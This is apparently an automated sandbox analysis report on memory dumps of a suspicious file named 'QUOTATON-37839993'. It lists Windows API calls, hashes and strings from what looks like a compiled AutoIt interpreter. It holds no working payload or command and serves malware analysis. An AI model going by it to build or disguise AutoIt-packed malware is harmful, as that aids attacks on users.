• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
• Opcode ID: 894b64f16ba2c2b6bc770e327e674ff006e08052b88c768ad1a5a20d0b385350
• Instruction ID: 4e1ccf5132cdd94056eaee60b240f9ae989e85833c325ef7ccbd0414d956a7f6
• Opcode Fuzzy Hash: 894b64f16ba2c2b6bc770e327e674ff006e08052b88c768ad1a5a20d0b385350
• Instruction Fuzzy Hash: F131F4B1D4831A6ADF109FB68C8999FBFE8FF04754F50452AE50DF7281DA7865008FA1
APIs
• _memset.LIBCMT ref: 00E8A259
• DestroyWindow.USER32(?,?), ref: 00E8A2D3
  • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E8A34D
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E8A36F
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E8A382
• DestroyWindow.USER32(00000000), ref: 00E8A3A4
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E00000,00000000), ref: 00E8A3DB
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E8A3F4
• GetDesktopWindow.USER32 ref: 00E8A40D
• GetWindowRect.USER32(00000000), ref: 00E8A414
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E8A42C
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E8A444
  • Part of subcall function 00E025DB: GetWindowLongW.USER32(?,000000EB), ref: 00E025EC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
• String ID: 0$tooltips_class32
• API String ID: 1297703922-3619404913
• Opcode ID: 449b7358463150c16088676e4e42261ecce96fa230a4cca206e690864cd19502
• Instruction ID: 9accd3c133808646f65f11376e4af99cb810e9ac7c0ca59a0bf4d678083e022e
• Opcode Fuzzy Hash: 449b7358463150c16088676e4e42261ecce96fa230a4cca206e690864cd19502
• Instruction Fuzzy Hash: 4771C171140204AFEB24DF28CC49F6A77E6FB88304F08452DF99DA72A0D771E94ADB52
APIs
• CharUpperBuffW.USER32(?,?), ref: 00E84424
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E8446F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
• Opcode ID: 4e48fd46fda4329c75368fe518b0a393bcf1a92bc4b130c33a163adeb561f767
• Instruction ID: bdd0d605bf75c2ffc1dde49353d541034d9571de53d6a9fa8a82fa2049750ab3
• Opcode Fuzzy Hash: 4e48fd46fda4329c75368fe518b0a393bcf1a92bc4b130c33a163adeb561f767
• Instruction Fuzzy Hash: C4913BB02043119BCB04EF10C451AAEB7E1EF95354F44A869E89A7B3E3DB31ED49CB91
APIs
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E8B8B4
• LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00E891C2), ref: 00E8B910
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E8B949
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E8B98C
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E8B9C3
• FreeLibrary.KERNEL32(?), ref: 00E8B9CF
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E8B9DF
• DestroyIcon.USER32(?,?,?,?,?,00E891C2), ref: 00E8B9EE
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E8BA0B
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E8BA17
  • Part of subcall function 00E22EFD: __wcsicmp_l.LIBCMT ref: 00E22F86
Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
• String ID: .dll$.exe$.icl
• API String ID: 1212759294-1154884017
• Opcode ID: 67e788c1fdad07bda7d4d6a16fbf1f810a575f2bcdd006a85eac8818c0e44469
• Instruction ID: fdac2a920d22e019541a57c2a3ca7dd2476bae82a9f20576939341d339c94cef
• Opcode Fuzzy Hash: 67e788c1fdad07bda7d4d6a16fbf1f810a575f2bcdd006a85eac8818c0e44469
• Instruction Fuzzy Hash: 8861F071900215BEEB18EF64DC41FBE7BACEB08710F10811AFA19F61D1DB749994DBA0
APIs
  • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
  • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
• CharLowerBuffW.USER32(?,?), ref: 00E6A3CB
• GetDriveTypeW.KERNEL32 ref: 00E6A418
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E6A460
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E6A497
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E6A4C5
  • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 2698844021-4113822522
• Opcode ID: 842f1cf2940ccf4c260aacb2bf06a54c1333e5f3fc6491b9011ba6924868ffd9
• Instruction ID: d8fca62e88eaab3e3a379563053067e924d6bd36845f2482c0d1aa1aee1a1154
• Opcode Fuzzy Hash: 842f1cf2940ccf4c260aacb2bf06a54c1333e5f3fc6491b9011ba6924868ffd9
• Instruction Fuzzy Hash: A1514B715043059FC700EF10C99186BB7E8EF94758F04A86DF89A772A2DB31AD4ACF52
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00E3E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00E5F8DF
• LoadStringW.USER32(00000000,?,00E3E029,00000001), ref: 00E5F8E8
  • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,00E3E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00E5F90A
• LoadStringW.USER32(00000000,?,00E3E029,00000001), ref: 00E5F90D
• __swprintf.LIBCMT ref: 00E5F95D
• __swprintf.LIBCMT ref: 00E5F96E
• _wprintf.LIBCMT ref: 00E5FA17
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E5FA2E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 984253442-2268648507
• Opcode ID: ac8c36be403fe4ee97160254c3993f75bbb7d25333b8c995cc40df1658517f91
• Instruction ID: 2fb9c485aaaea2394f28237cb5a5380ef45b16cad78fc4ccff5f6633fde830a3
• Opcode Fuzzy Hash: ac8c36be403fe4ee97160254c3993f75bbb7d25333b8c995cc40df1658517f91
• Instruction Fuzzy Hash: 0D412C72C04219AACF04FBE0DD86DEEB7B8AF58301F502465F605761A2EA356F49CB61
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00E89207,?,?), ref: 00E8BA56
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00E89207,?,?,00000000,?), ref: 00E8BA6D
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00E89207,?,?,00000000,?), ref: 00E8BA78
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00E89207,?,?,00000000,?), ref: 00E8BA85
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00E8BA8E
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E89207,?,?,00000000,?), ref: 00E8BA9D
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00E8BAA6
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00E89207,?,?,00000000,?), ref: 00E8BAAD
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E89207,?,?,00000000,?), ref: 00E8BABE
                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E92CAC,?), ref: 00E8BAD7
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00E8BAE7
                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00E8BB0B
                                                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00E8BB36
                                                                      • DeleteObject.GDI32(00000000), ref: 00E8BB5E
                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00E8BB74
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                      • String ID:
                                                                      • API String ID: 3840717409-0
                                                                      • Opcode ID: b802d86205420bc6c2c7284adc4a364a930b17b106044138b3cf85cf93bb58a8
                                                                      • Instruction ID: d16925126450d1fd4a4a81436a87bb36583e3e332eb30714595c770bce9505b6
                                                                      • Opcode Fuzzy Hash: b802d86205420bc6c2c7284adc4a364a930b17b106044138b3cf85cf93bb58a8
                                                                      • Instruction Fuzzy Hash: 05410975600204EFDB119FA6DC88EAABBB8FB89715F104169F90DE7261D7309D05DB60
                                                                      APIs
                                                                      • __wsplitpath.LIBCMT ref: 00E6DA10
                                                                      • _wcscat.LIBCMT ref: 00E6DA28
                                                                      • _wcscat.LIBCMT ref: 00E6DA3A
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E6DA4F
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E6DA63
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00E6DA7B
                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00E6DA95
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E6DAA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                      • String ID: *.*
                                                                      • API String ID: 34673085-438819550
                                                                      • Opcode ID: 5ab1ed6779d1690849c439a2f30650965c56e6c1acfb9b8431cbb85382ff7ade
                                                                      • Instruction ID: 641926b964d6b47f7854f1bed2b54d0643f8b8f8659e13911a8ca7bb356dbbd8
                                                                      • Opcode Fuzzy Hash: 5ab1ed6779d1690849c439a2f30650965c56e6c1acfb9b8431cbb85382ff7ade
                                                                      • Instruction Fuzzy Hash: 9081C571A483009FCB24DF64DC449AAB7E4BFC9394F58AC2EF489EB251D670D944CB52
                                                                      APIs
                                                                        • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E8C1FC
                                                                      • GetFocus.USER32 ref: 00E8C20C
                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00E8C217
                                                                      • _memset.LIBCMT ref: 00E8C342
                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E8C36D
                                                                      • GetMenuItemCount.USER32(?), ref: 00E8C38D
                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00E8C3A0
                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E8C3D4
                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E8C41C
                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E8C454
                                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00E8C489
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                      • String ID: 0
                                                                      • API String ID: 1296962147-4108050209
                                                                      • Opcode ID: 14ba9b244be1e7c986e50a3d9539e43ae6959993197c5cd571ec7fb337acb54a
                                                                      • Instruction ID: 0813d992180ffa69d52be2e2f19249ba9e261f9c0c535f24fd0e763a95c7240d
                                                                      • Opcode Fuzzy Hash: 14ba9b244be1e7c986e50a3d9539e43ae6959993197c5cd571ec7fb337acb54a
                                                                      • Instruction Fuzzy Hash: A2819E712083019FD710EF14D894A6BBBE4FB89318F20592EF99DB72A1D770D945CB62
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 00E7738F
                                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00E7739B
                                                                      • CreateCompatibleDC.GDI32(?), ref: 00E773A7
                                                                      • SelectObject.GDI32(00000000,?), ref: 00E773B4
                                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00E77408
                                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00E77444
                                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00E77468
                                                                      • SelectObject.GDI32(00000006,?), ref: 00E77470
                                                                      • DeleteObject.GDI32(?), ref: 00E77479
                                                                      • DeleteDC.GDI32(00000006), ref: 00E77480
                                                                      • ReleaseDC.USER32(00000000,?), ref: 00E7748B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                      • String ID: (
                                                                      • API String ID: 2598888154-3887548279
                                                                      • Opcode ID: 03f06cd0fdf73297c65755e4e6d76b3c6a39a64fe6510fcd445d794d02949b53
                                                                      • Instruction ID: 0374e428d7a9dd63cb1fb46b06af37859a148e6d7505738d98ca8e633c55f5a5
                                                                      • Opcode Fuzzy Hash: 03f06cd0fdf73297c65755e4e6d76b3c6a39a64fe6510fcd445d794d02949b53
                                                                      • Instruction Fuzzy Hash: E5514775904309EFCB14CFA9CC84EAEBBB9EF48310F148529F99AA7251D731A944DB50
                                                                      APIs
                                                                        • Part of subcall function 00E20957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E06B0C,?,00008000), ref: 00E20973
                                                                        • Part of subcall function 00E04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E04743,?,?,00E037AE,?), ref: 00E04770
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E06BAD
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E06CFA
                                                                        • Part of subcall function 00E0586D: _wcscpy.LIBCMT ref: 00E058A5
                                                                        • Part of subcall function 00E2363D: _iswctype.LIBCMT ref: 00E23645
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                      • API String ID: 537147316-1018226102
                                                                      • Opcode ID: 46d143f53d0ca72e962d22bd3fe1709706719b640963a8930a571dc45be519da
                                                                      • Instruction ID: 3df62ccec88ad97b8d2b9f44d145e4ca0eee0a266fa9d61d3a4b57e307a6ec7f
                                                                      • Opcode Fuzzy Hash: 46d143f53d0ca72e962d22bd3fe1709706719b640963a8930a571dc45be519da
                                                                      • Instruction Fuzzy Hash: 32029E711083419FC714EF24C881AAFBBE5AF98314F14681EF4D6A72E1DB30D989CB52
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E62D50
                                                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00E62DDD
                                                                      • GetMenuItemCount.USER32(00EC5890), ref: 00E62E66
                                                                      • DeleteMenu.USER32(00EC5890,00000005,00000000,000000F5,?,?), ref: 00E62EF6
                                                                      • DeleteMenu.USER32(00EC5890,00000004,00000000), ref: 00E62EFE
                                                                      • DeleteMenu.USER32(00EC5890,00000006,00000000), ref: 00E62F06
                                                                      • DeleteMenu.USER32(00EC5890,00000003,00000000), ref: 00E62F0E
                                                                      • GetMenuItemCount.USER32(00EC5890), ref: 00E62F16
                                                                      • SetMenuItemInfoW.USER32(00EC5890,00000004,00000000,00000030), ref: 00E62F4C
                                                                      • GetCursorPos.USER32(?), ref: 00E62F56
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00E62F5F
                                                                      • TrackPopupMenuEx.USER32(00EC5890,00000000,?,00000000,00000000,00000000), ref: 00E62F72
                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E62F7E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                      • String ID:
                                                                      • API String ID: 3993528054-0
                                                                      • Opcode ID: 81052a70a024ef18f110571003c392a89e9af818d68948f49fb20b0a8abb2687
                                                                      • Instruction ID: 44dc1bcfafd68e28909b6725a5e5fae3b997602f97dbf87f838f7c9f3c5c9709
                                                                      • Opcode Fuzzy Hash: 81052a70a024ef18f110571003c392a89e9af818d68948f49fb20b0a8abb2687
                                                                      • Instruction Fuzzy Hash: E1710770681A05BEEB228F54EC49FAABF64FF043A8F10122AF719BA1E1C7725C10D751
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00E788D7
                                                                      • CoInitialize.OLE32(00000000), ref: 00E78904
                                                                      • CoUninitialize.OLE32 ref: 00E7890E
                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00E78A0E
                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00E78B3B
                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00E92C0C), ref: 00E78B6F
                                                                      • CoGetObject.OLE32(?,00000000,00E92C0C,?), ref: 00E78B92
                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00E78BA5
                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E78C25
                                                                      • VariantClear.OLEAUT32(?), ref: 00E78C35
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                      • String ID: ,,
                                                                      • API String ID: 2395222682-1556401989
                                                                      • Opcode ID: 5baa075a0a5322fecc3685b7232f139b2a7942c7b12e363bc148ee35d755a85a
                                                                      • Instruction ID: a499d19b95de1ec91906fa749e4b492901538e40e3c53b5a0c81fcab0f20848e
                                                                      • Opcode Fuzzy Hash: 5baa075a0a5322fecc3685b7232f139b2a7942c7b12e363bc148ee35d755a85a
                                                                      • Instruction Fuzzy Hash: 07C146B1608305AFC704DF64C98892BB7E9FF99348F00992DF989AB251DB31ED05CB52
                                                                      APIs
                                                                        • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
                                                                      • _memset.LIBCMT ref: 00E5786B
                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E578A0
                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E578BC
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E578D8
                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E57902
                                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00E5792A
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E57935
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E5793A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                      • API String ID: 1411258926-22481851
                                                                      • Opcode ID: c2a0f8a6bc869f2d6b864d6c98dd0c4eeac4d0a4f2a6ba125a7125dee0e4f3a6
                                                                      • Instruction ID: 83bdcac60a83fb40f952cc4fd9a30f7c9356a3b382039fb7e21ff23fd705b47c
                                                                      • Opcode Fuzzy Hash: c2a0f8a6bc869f2d6b864d6c98dd0c4eeac4d0a4f2a6ba125a7125dee0e4f3a6
                                                                      • Instruction Fuzzy Hash: 5D412872C14229AECF11EBA4EC85DEEB7B8FF44305F405429E945B31A1DB30AD58CBA0
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7FDAD,?,?), ref: 00E80E31
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                      • API String ID: 3964851224-909552448
                                                                      • Opcode ID: 3e22b886ab536e193636bccb7a9e17e62a2032b150403193ce095986376df7d1
                                                                      • Instruction ID: 2bf584048564c11f029036c8e0266e2571f04824c453371aac11d75ef8276a42
                                                                      • Opcode Fuzzy Hash: 3e22b886ab536e193636bccb7a9e17e62a2032b150403193ce095986376df7d1
                                                                      • Instruction Fuzzy Hash: 6C414F7120025A8BCF60EF10E896AEF37A4BF51354F546464FD6D3B292DB309D5ACB60
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00E3E2A0,00000010,?,Bad directive syntax error,00E8F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00E5F7C2
                                                                      • LoadStringW.USER32(00000000,?,00E3E2A0,00000010), ref: 00E5F7C9
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                      • _wprintf.LIBCMT ref: 00E5F7FC
                                                                      • __swprintf.LIBCMT ref: 00E5F81E
                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E5F88D
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                      • API String ID: 1506413516-4153970271
                                                                      • Opcode ID: 5051942ad8d748c686e389f0668cf3d0db818da1429f27c5699a0498566f9ffd
                                                                      • Instruction ID: 03f73604bac8ca631709582b9d97e71ccc14fe251a9f61721a97db0712938010
                                                                      • Opcode Fuzzy Hash: 5051942ad8d748c686e389f0668cf3d0db818da1429f27c5699a0498566f9ffd
                                                                      • Instruction Fuzzy Hash: 7A215C3290021ABFCF15EF90CC4AEEE77B9BF18304F041865F555761A2EA31AA58DB51
                                                                      APIs
                                                                        • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
                                                                        • Part of subcall function 00E07924: _memmove.LIBCMT ref: 00E079AD
                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E65330
                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E65346
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E65357
                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E65369
                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E6537A
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: SendString$_memmove
                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                      • API String ID: 2279737902-1007645807
                                                                      • Opcode ID: c492a138dbe8979254d1a9e03e2e04647fc50bee66202486544bd4f267acc4fa
                                                                      • Instruction ID: 15d0f8b8aa4da109bebf411823846c1067c5eb92a692780fc8baf53dc114b0aa
                                                                      • Opcode Fuzzy Hash: c492a138dbe8979254d1a9e03e2e04647fc50bee66202486544bd4f267acc4fa
